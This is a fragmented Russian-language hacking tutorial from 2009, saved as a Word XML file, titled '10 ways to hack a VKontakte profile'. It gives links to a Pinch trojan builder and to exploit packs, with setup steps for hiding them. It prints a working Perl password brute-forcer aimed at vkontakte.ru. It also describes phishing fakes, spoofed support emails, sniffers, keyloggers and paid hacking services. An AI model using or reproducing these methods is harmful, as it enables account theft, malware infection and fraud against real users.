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способов взлома анкеты vkontakte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--------------------------------------------------------------</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>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м потреб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настраивать пинч(если это у вас уже получилось, то остальные 2 требования можно не смотре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ые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капелька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Через мыло, если мы его знаем то уже все проще, ведь имеется как минимум 15 методов взлома почты...НО есть и еще один минус, если пароль "корявый",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еется надежный, но с его восстановлением проблемы, когда такой высылают на почту, то он принимает "левый" вид, и соответственно не работает. не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ь, поэтому останавливаться не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ейк, достаточно простой способ, кидаем ссылку жертве любым способом(ася, через лс и тд) скачать его можно по ссылке http://slil.ru/257744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роян. Эту категорию мы разделим на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кинуть "чистый" файл, либо ссылку на загрузку его, но тут еще надо чтобы пользователь его запустил. http://slil.ru/25774480 - здесь лежит билдер пинча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арсер http://slil.ru/25774491 , если вы захотите чтобы отчеты шли на гейт - вот подходящий от Генома - http://slil.ru/25774495 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">б) кейлогер - менее полезный, но если жертва его "словит" и вы покопаетесь(причем оочень долго) с отчетом, то пароль получите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плоит, тут ничего сложного нету, НО ЕСТЬ МИНУС! Паблик сплоиты пробивают в основном ие6 и то, примерно, 6/10(имх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ую армитаж(айс пак тоже в теме). Прост в настройке, нужно только создать базу мускуль(делается в пару кликов), и отредактировать файлы(db.php config.php), после того как зальете на хост, выставляем нужные права, на папку load - 777. config.php - 7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ать 3 связки можно по ссылке http://slil.ru/25776403 - здесь лежат мпак, айспак и армит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Ы когда будете настраивать пинч, устанавите права на гейт 775, на папку в которую будут идти отчеты - 777, и не забывайте что не надо называть папку с отчетами OtchetyOTpincha, имхо палевно, лучше назовите 404 или еще как, ну что бы внимания не привлекало...Папку в которой будет лежать сплоит,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иминуйте на что-нить типа myphotos и тд... тк люди будут эту ссылку себе в браузер пихать, не нужно что бы там было написанно EXPLOIT...лишнее палево ни к чему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дальш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пинч уже настроен на гейт или почту, желательно что бы он еще и закриптованный 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им по ссылке на файл install.php нашего сплоита, а потом идем в админку, устанавливаем настройки, выбераем файл который будет грузится жертве, теперь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лежать в папке load под именем fi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даем ссылку жертве, и ждем с надеждой что ее пробьет и отчет с паролем нам пр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Брутфорс, как всем известно - перебор паролей. Способ долгий, и не всегда сработает(в случае пароля D5&amp;%-AefV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брутфорсера нам потребуется активперл скачать мона тут http://download.softportal.com/softw...ctiveperl.html либо по ссы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enwer.ru/packages/perl.html</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pP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#!/usr/bin/per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e IO::Socke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e MD5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e thread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e threads::shar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@pass : shar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n (pass, "&lt;$dic"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@pass = pass(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(0..$threads) {$trl[$_] = threads-&gt;create(&amp;Brut, $_);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(@trl) { $_-&gt;join; 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 Br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(@pass){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$pass = shift @pas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$md5 = MD5-&gt;hexhash($pass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$sock = IO::Socket::INET-&gt;new(Proto=&gt;'tcp',PeerAddr=&gt;'vkontakte.ru',PeerPort=&gt;80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$sock "HEAD http://vkontakte.ru/ HTTP/1.0rn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Host: vkontakte.rurn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Accept: */*rn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Content-Type: application/x-www-form-urlencodedrn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User-Agent: Mozillorn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C*****: remixchk=2; remixmid=$id; remixemail=$mail; remixpass=$md5rn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Connection: closernrn"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$answ = &lt;$sock&gt;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ose $sock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"$pass $answ"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($answ =~ /302/){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n (good, '&gt;&gt;good.txt'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good "$id:$pass:$md5n"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"$id:$pass:$md5n"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ose go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it;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to Nex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 pa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(@mas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(&lt;pass&gt;{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sh @mas, $_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if (@mas == 400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mp @ma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urn @ma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ьте сменить разширение на brut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dic = ‘passl.txt’; #паслист для брдутфор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id = 1; #айдишник цели(его можно взять из адресной строки когда вы зашли на страницу жерт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mail = ‘мыло’; #мыло, значек @ меняем на %40 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">$threads = Х; # где Х - количество пот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м лень копаться со всем этим, то есть неплохой брут на С. Скачать его можно по ссылке http://slil.ru/25774498, сразу говорю, если не запускается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проблемы, ибо все прекрасно работ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Имхо самый надежный способ, открываем исходник нашего фейка, закидываем в него наш код ******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когда жертва перейдет на нашу ссылку, мы увеличиваем вероятность того, что юзера пробьет, либо через браузер, либо через тупость, тк теперь у на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е комбинированная атака на мозг(фейк) и браузер(код ******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Способ приводится много где, здесь нужно поискать сайты на которых сидит жертва(форумы, почта и пр) и попытаться похекать что-то из вышеперечислен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ось найдем старый заброшенный пароль, а он подой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как обычно СИ, пробуем отправить письмо от адресата durov@vkontakte.ru или support@vkontakte.ru с текстом типа, ваша страница на сайте vkontakte.ru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локированна через N дней, если вы не подтвердите какую-нить хрень, методом отправки нам па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, можно прислать письмо типа, вам пришло личное сообщение/открытка и пр, от такого-то пользователя, что бы ее прочитать перейдите по ссылке, а ссы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вести на наш фей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бы отправить письмо с "левого" адреса, нужен какой-нить майлер, например, этот http://softnic.ru/soft/programm_4223.html, либо любой подходящий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 забудьте зарегить себе не привлекающее мыло, похожее на суппортское, и вписать его в поле копия.(что бы пароли пришли именно вам на поч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Снифер, тут лучше отправлять его на почту(если мы знаем мыло), тогда мы без лишних проблем сможем перехватить сессию, и с помощью системы восстановления пароля на сайте вконтакте получить письмо с паро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forum.antichat.ru/showthread.php?p=4572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сниферы и получше, но они платные, все же тема распространена и в гуле можно ввсести запрос на пхп снифер и найти много полезной инф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ХSS, паблик дырок на этом сайте нету, так что кража кукисов маловероятна, хотя если ооочень долго подождать, то можно и дождаться паблик уязвимости -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подход к делу бредовый, поэтому останавливаться на нем не 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Самый простой способ, единственное что от вас требуется - уметь работать с платежными системами и иметь деньги. Просто закажите взлом если вам не пом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ин из 9 пунктов, может найдется умелец который сломает неприступную жертву. Поискать такогого можно здесь - http://www.hackzone.ru/forum/list/fid/23/ или здесь http://www.hackzone.ru/forum/list/fid/4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 как задать вопрос воспользуйтесь полезными ссылками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gle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poiskinfo.net/stat/st1.ph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segfault.kiev.ua/smart-questions-ru.htm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penguin.kurgan.ru/doc/Perl/perlfaq1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на последок - googleforidiots.c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этом все, надеюсь вам не особо скучно было при чтении всего эт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c) by [-E-N-E-R-G-Y-] 2009 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  <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Быстрее фейком!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> высылаешь письмо от имени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kontak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где написано "Здравствуйте, Вам пришло сообщение, чтобы прочитать его, перейдите по ссылк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ontak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544685(только вот ссылка на самом деле будет вести на фейк). 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Помните!!!  Незаконного вторжение в личную информацию конфиденциального характера преследуется законом Украины «Про информацию» и за нарушение на Вас ставят к административной ответственности.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www</dc:creator>
  <dc:description/>
  <cp:keywords/>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy>www</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2009-05-22T12:51:00Z</dcterms:modified>
  <cp:revision>3</cp:revision>
  <dc:subject/>
  <dc:title>10 способов взлома анкеты vkontakte</dc:title>
</cp:coreProperties>
</file>